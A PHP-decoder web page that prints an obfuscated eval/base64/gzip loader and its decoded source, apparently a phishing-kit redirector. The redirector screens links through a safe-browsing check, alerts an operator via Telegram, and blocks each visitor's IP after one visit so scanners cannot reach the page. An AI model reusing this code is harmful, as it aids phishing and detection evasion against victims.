Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php eval(gzuncompress(base64_decode('eJzdVltT4zYUfs+v0HpS5OxAApQyHVigIRHg2dzqmN0yIaM..

Decoded Output download

include 'config.php';
include_once 'functions.php';
include ('blocker.php');

if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) {
    $remoteIP = $_SERVER["HTTP_CF_CONNECTING_IP"];
} else {
    $remoteIP = $_SERVER['REMOTE_ADDR'];
}

$_GET[$fuck1] = ($fuck2);


// Create SafeApiResult.json file
file_exists('SafeApiResult.json') || file_put_contents('SafeApiResult.json', json_encode(['safe' => false, 'url' => URLS_FILE, 'last_check' => 0, 'client' => ['ip' => $_SERVER['HTTP_X_REAL_IP'] ?? $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'], 'user-agent' => $_SERVER['HTTP_USER_AGENT']]], 64 | 128 | 256));

// Variables
$safeApiResults = json_decode(file_get_contents('SafeApiResult.json'), true);
$reported = false;

// Checking URL
if ((time() - $safeApiResults['last_check']) > SAFE_BROWSING_CHECK_INTERVAL) {
    foreach (file(URLS_FILE, FILE_IGNORE_NEW_LINES|FILE_SKIP_EMPTY_LINES) as $line) {
        $safeApiResults = ['safe' => checkUrlHealth($line), 'url' => $line, 'last_check' => time(), 'last_check_human' => date('Y/m/d H:i:s'), 'client' => ['ip' => $_SERVER['HTTP_X_REAL_IP'] ?? $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'], 'user-agent' => $_SERVER['HTTP_USER_AGENT']]];
        $safeApiResults['safe'] || telegramBot('sendMessage', [
            'chat_id'    => TELEGRAM_BOT_ADMIN_USERID,
            'text'       => "*Not Safe URL Report:*
" . reportStyler($safeApiResults),
            'parse_mode' => 'Markdown',
        ]) and ($reported = true);
        if($safeApiResults['safe']) {
            break;
        }
        removeLine($line, URLS_FILE);
    }
    file_put_contents('SafeApiResult.json', json_encode($safeApiResults, 64 | 128 | 256));
}

// Processing Get Query
$query = null;
if($_GET !== []) {
    foreach ($_GET as $key => &$value) {
        if ($key === $fuck1) continue;
        $value = isBase64($value) ? base64_decode($value) : $value;
    }
    unset($value);
    $query = http_build_query($_GET);
    $query = '?' . str_replace(['%40'], ['@'], $query);
    $currentUrl = explode('/', $safeApiResults['url']);
    if (strpos(end($currentUrl), '.') === false) {
        $query = '/' . $query;
    }
}


// Redirecting
if ($safeApiResults['safe']) {
    
    if (file_exists(".htaccess") ==true){
    file_put_contents(".htaccess", "
deny from ".$remoteIP, FILE_APPEND);
}
else{
    file_put_contents(".htaccess", 'ErrorDocument 403 '.FAILED_PAGE_URL."
".'Options -Indexes'."
".'order allow,deny'."
".'allow from all'."
".'deny from '.$remoteIP);
}

    (REDIRECT_TYPE === 1) ? header('Location: ' . $safeApiResults['url'] . $query) : sayIt("<script type=\"text/javascript\">window.location.href = \"" . $safeApiResults['url'] . $query . "\"</script>
");
}
else {
    (REDIRECT_TYPE === 1) ? header('Location: ' . FAILED_PAGE_URL) : sayIt("<script type=\"text/javascript\">window.location.href = \"" . FAILED_PAGE_URL . "\"</script>
");
    if (TELEGRAM_BOT_REPORT_EVERY_TIME && !$reported) {
        telegramBot('sendMessage', [
            'chat_id'    => TELEGRAM_BOT_ADMIN_USERID,
            'text'       => "*Not Safe URL Report:*
" . reportStyler($safeApiResults),
            'parse_mode' => 'Markdown',
        ]);
    }
}

Did this file decode correctly?

Original Code

<?php 

eval(gzuncompress(base64_decode('eJzdVltT4zYUfs+v0HpS5OxAApQyHVigIRHg2dzqmN0yIaMRtkK8OLYryVxm4b/3SI6DE6C0nT506gdbOjo3ffrOkcPYj7KAI+wn8SS8rqfTFO9XwlxKk9iHpUkW+ypMYrm8imx8FSX+DRdGXtuvVMIJskMpubKrdEjcL8QdWWeeN6CtE9rq93qk5Tm9U+oMrHGthr5XEDxVwWeJ4s4AHaB3rfYrT4hHkv+ZLXZJt+8R2my3XawtKpUqPSXeqDrJ/JutMejaZritU640GqglOFMcDdmEN9PQ5TKLVP2bTGI0CSNe0S/K70OppI1fKuEaenw0mjTNFAUgFY/fUF1H+kN57CcBt0dYggpGB4dowmBX6whnIjLzc7czpCdOh4AsYhLcTrl/Y5Y2QeRHIcQw0xEOUzN4BsCA9xt1SbMDqOExOjp6uXrSd7823TZp69GqzhKEOi3JxQa7LmKuODuHGW2ekp6Hx2NQ391Bj2hr+2d4b/+0W9MwA8pfmAjZVcRlpSrLyEg4EINKwA0qBslr/g6StXWkRMbBN5AgTYTiAfgxMObhWhqwML7WUBpi2iqccbuGNtBK/FEZ4XENHaJh84TQY7f/daiJ1zojrc/U6Xmw52an4O0kAdb4U2TytUvnpd/UOe31XUJ75CvtOD0yfDTS4WdnQEl34F3k0hpiElWjMOaFV8PqF/CUiGKyPBfRGWeRmtq5cYk4RvCSNPnel+R0ms1YbFYDoL+NLxqzRoDO9sI9qeH9T5Ns/y205lCNdU0qHvFrwWbHibKx5HHQ5VJCACjD0cJeP9ifMkXDAOsJhPZIh5y6zS497nuQX9fpmfBOe33ZTPF7hecTMLM+9hJl2ogmHXINL/c+XsYWqqOcpUP1EHFhryRdW/GbMiE5nUE1GCRwl4mbILmD/rHQA56yOIBOVmL/vCAKlXCyGqcAp8w2/VwBlW+eDZ8WI91fb3kHKGXPibUg+jxQrvtPut9Kbq+1jSdTyQOR+HBwupZPuUK/Zlw8VKq/6w9sOs6iCO4k2Ktu8ujDAZTL+EWR5ou62m74g8Z0rXrLomyp7nSTyJfBR35Z1JDeUBhnvEQ4YwiRQ3nMJN/dsQtXR+jKCIpOVsj35jZlxLLYXJO5Rr6w2NJUqZReZWEUUCPKs1/VwkcYaCWVoECBiPn6PvlhZ1OX0gj/oj+5amHnZ0LA0UDvAGN+n0Y6RdyAU3nBEt1MxnM7jQoESRNpQwXZJTe6R9Th9tNwmca71MQWaTZ0mvm0AOApv3ddHoSCw79FfG069DtsXaRTvpCt+lQxX/PD0pmYEvj+BidLuuvIuowDHj+giUhmyKovfiXmDbw5GJBe23BQ/3D8JZeYCJGIduJnM1hEO5s/AkAnTXDXpgNoXRSKpw5xrTrup+aPCm04kMU9l3guT0TABWJRlNyt6/QKuZHkucKwkD5vAD9vIK8bna7tkrbjwu8T9S4GxJzTlmbplDOIYuNO4jOdxh4yR/QqCxZnp2ks2YOjbOuT9EWYKqQeUn5waeku2PjGblkuvrQO78IY2lU9mvuvTwWfABUuLev9ODCwLq1PjdzZIexzcQhzHvy9ba3g/69tY8Xvq2kXhF26T1wy6LseJXC1XVDP6RK0toY+LPp4uYj+3xfYohv8AXa9upc=')));
?>

Function Calls

gzuncompress	1
base64_decode	1

Variables

None

Stats

MD5	4e067d1a37ab8f993f99c3246446fac3
Eval Count	1
Decode Time	35 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats